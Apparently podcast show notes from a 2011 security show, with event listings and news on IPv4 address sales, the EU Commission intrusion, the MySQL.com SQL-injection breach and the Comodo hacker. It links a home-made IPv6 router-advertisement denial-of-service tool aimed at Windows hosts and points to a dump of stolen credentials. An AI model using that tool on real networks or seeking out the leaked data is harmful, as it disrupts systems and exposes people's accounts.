Where: Holiday Inn – Glenwood Avenue in Raleigh, NC
When: Thursday, May 5, 2011 – Thursday, July 7, 2011
Where: Federal Way, WA
Discount Code: MRPOD10 for 10% savings
My Hard Drive Died
Data Recovery Expert Certification
When: June 6-10, 2011
Where: Atlanta, GA
When: Sept 19-22, 2011
Where: Brussels, Belgium
CFP & CFT open now! http://blog.brucon.org/2011/01/brucon-call-for-papers-2011.html
When: September 30th – October 2, 2011
Where: Louisville, KY
ISDpodcast Mailing List: http://groups.google.com/group/isdpodcast
Information Security Leaders Survey: https://www.surveymonkey.com/s/isl-2011-certsurvey
Hackers for Charity Cookbook is asking the hacker community to contribute their best recipes to be included in a Hackers Cookbook. ALL PROCEEDS GO TO HACKERS FOR CHARITY!!! 100%. Submit your best recipes to email@example.com for consideration. First round of submissions are due by 4/1/2011
Intro/Outro Music provided by JimmyZ (http://soundcloud.com/jimmyz)
StoriesTool: IPv6 Denial of Service (DoS) Tool. http://isdpodcast.com/files/single_ra.tar.gz. Uses THC IPV6 ATTACK TOOLKIT, to generate single Router Advertisement (RA) messages with different source addresses. Rather than flood the network as with flood_router6, it allows you to target the IPv6 stack in Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 to cause a denial of service (CPU consumption and system hang) by sending a lower number at a slower rate. Original idea came from http://samsclass.info/ipv6/proj/proj8x-124-flood-router.htm. All we did was create the appropriate single_ra.c and slow_flood script. This affects all systems on the local-link.
Microsoft has offered to pay $7.5m (£4.7m) for net addresses from bankrupt telecoms firm Nortel. The 666,624 IP version 4 (IPv4) net addresses were put up for auction as part of the sell-off of Nortel's assets. Blocks of IPv4 are valuable because the pool of this generation of address is close to running dry. It was predicted that a market in IPv4 would appear among companies facing a costly migration to the newer IPv6.
Details of the sale were contained in papers filed to a Delaware bankruptcy court and show that Microsoft's bid was the highest of the 80 firms asked if they wanted to make an offer for the IP addresses.
The deal is yet to be approved by that court and anyone who objects to it can file their comments before 4 April.
If it goes through, Microsoft will get hold of 470,016 of the IP addresses instantly and the remaining 196,608 will be released as former customers of Nortel are moved to other telecoms firms.
IP addresses are used to identify individual computing devices on the internet and private networks.
IPv4 allows for a maximum of approximately 4.3 billion devices.
That number seemed enough in the early 1980s when the standard was first proposed, however the rapid growth in personal computers, smartphones and other internet connected devices means that addresses have been rapidly running out.
Net firms are in the process of moving to version 6 of the IP addressing scheme, which offers more than 3 undecillion individual numbers (3 with 38 noughts)
However, the migration is happening very slowly.
In the interim, it is expected that IPv4 addresses will become increasingly valuable.
It is not clear why Microsoft wants to buy Nortel's supply, however many companies are keen to avoid the cost of changing their networking systems over to IPv6 compatible equipment.
The Microsoft-Nortel deal values the IPv4 address blocks at $11.25 (£7) each, higher than the price many firms charge for a .com domain. This was indicative, said experts, that the market for IPv4 addresses was heating up.
Registries that oversee the allocation of net addresses are also working on plans for a re-circulation system that takes IPv4 addresses from firms that are using IPv6 and releases them for use by others.
Geordy's comments: Supposedly IPv4 address blocks have not been recovered because it's a highly laborious task to do all of the proper checks to make sure the address is not in use and that makes it cost prohibitive. Now looking at this though, if we are talking about $11.25 per address, I would guess that we could easily outsource the task abroad for a fraction of that cost. Is IPv6 the future or is a cycle of address recovery and auctioning blocks off a reasonable stopgap measure for now? I almost missed this story but when you stop and think about it for a minute, you realize this is the tip of a huge iceberg . Beyond that, shouldn't IANA be selling these addresses and not (what's left of) Nortel?
The European Commission, including the body's diplomatic arm, has been hit by what officials said Thursday was a serious cyberattack. The attack was first detected on Tuesday and commission sources have said that it was sustained and targeted.
External access to the commission's e-mail and intranet has been suspended and staff have been told to change their passwords in order to prevent the "disclosure of unauthorized information," according to an internal memo to staff. Staff at the commission, the European Union's executive and regulatory body, have also been told to send sensitive information via secure e-mail.
The event came just days ahead of the European Council summit being held on Thursday and Friday. The summit brings together the leaders of E.U. member states and crucial decisions will be made on economic strategy, the war in Libya and the future structure of the E.U.
This led to early speculation that the source of the attacks may be Libya, but the commission was quick to rule this out. The attack is thought to be similar to the cyberattack on the French government in the run up to the G20 Summit in February 2010. That assault involved malware and targeted e-mail, with some of the related stolen information redirected to China.
Commission administration spokesman Antony Gravili said officials would not speculate on the source of the attacks in such a sensitive security matter. He did, however, confirm that the attackers targeted the information of some commission officials, in particular at the External Action Service, the body's foreign diplomatic arm.
"We are already taking urgent measures to tackle this. An inquiry's been launched. This isn't unusual as the Commission is frequently targeted," said Gravili. He added that there was no concrete evidence that the attack is linked to the E.U. summit.
An email was sent out earlier today on the Full-Disclosure mailing list, detailing the compromise of numerous MySQL websites along with portions of their database containing usernames and passwords.
MySQL offers database software and services for businesses at an enterprise level as well as services for online retailers, web forums and even governments. The vulnerability for the attack, completed using blind SQL injection and targeted servers including MySQL.com, MySQL.fr, MySQL.de and MySQL.it, was initially found by "TinKode" and "Ne0h" of Slacker.Ro (according to their pastebin.com/BayvYdcP dump of the stolen credentials) but published by "Jackh4x0r".
The stolen database contain both member and employee email addresses and credentials, as well as tables with customer and partner information and internal network details. Hashes from the database have been posted, with some having been already cracked.
A submission to XSSed.com also details an XSS (Cross Site Scripting) vulnerability affecting MySQL.com that may have provided a secondary entry point for compromising visitors or employees with the organization since early January of 2011.
This is definitely a shame for the folks behind MySQL since they were bought by Sun and later on by Oracle (through the Sun acquisition). MySQL is used by millions of users for small and medium sized databases, including by the popular blogging software WordPress.
The email sent to Full Disclosure lists out all the databases, tables and even some password hashes for the users at MySQL.com. There has been no response from MySQL on this issue yet. We have contacted them for a comment and will update this post once more information becomes available.
More updates coming soon….
This hack also compromised the database at Sun.com, more info on this at http://tinkode27.baywords.com/
More details are available here: http://blog.sucuri.net/2011/03/mysql-com-compromised.html
As H D Moore said on Twitter, either he is the hacker or a lunatic off his meds. For some reason, he sounds a lot like LIGATT in some of his sentences. For example:
"I’m not a group of hacker, I’m single hacker with experience of 1000 hackers, I’m single programmer with experience of 1000 programmers, I’m single planner/project manager with experience of 1000 project
managers, so you are right, it’s managed by a group of hackers, but it was only I with experience of 1000."
Either someone with serious USI, or someone capable.
For me, though, this alone defeated his argument that he has the experience of thousand hackers:
"It was not really a managed hack. At first I decided to hack RSA algorithm, I did too much investigation on SSL protocol, tried to find an algorithm for factoring integer, analyzed existing algorithms, for now I was not able to do so, at least not yet, but I know it’s not impossible and I’ll prove it."
Factoring integers is a NP time algorithm. Its not NP-complete, but its still a hard problem. So if he solves the factorization problem, then he has broken down a whole bunch algorithms that the crypto world is based on; and Comodo hack is the least of our problems.
Geordy's comments: and this will keep happening over and over again until there is sufficient public outrage or federal regualtion that leads to changing our broken banking system. It's amazing how little security there really is when it comes to something that all of us find as vitally important as our money. It's continually amazing that it's cheaper for the bank just to accept these losses than to work towards a solution.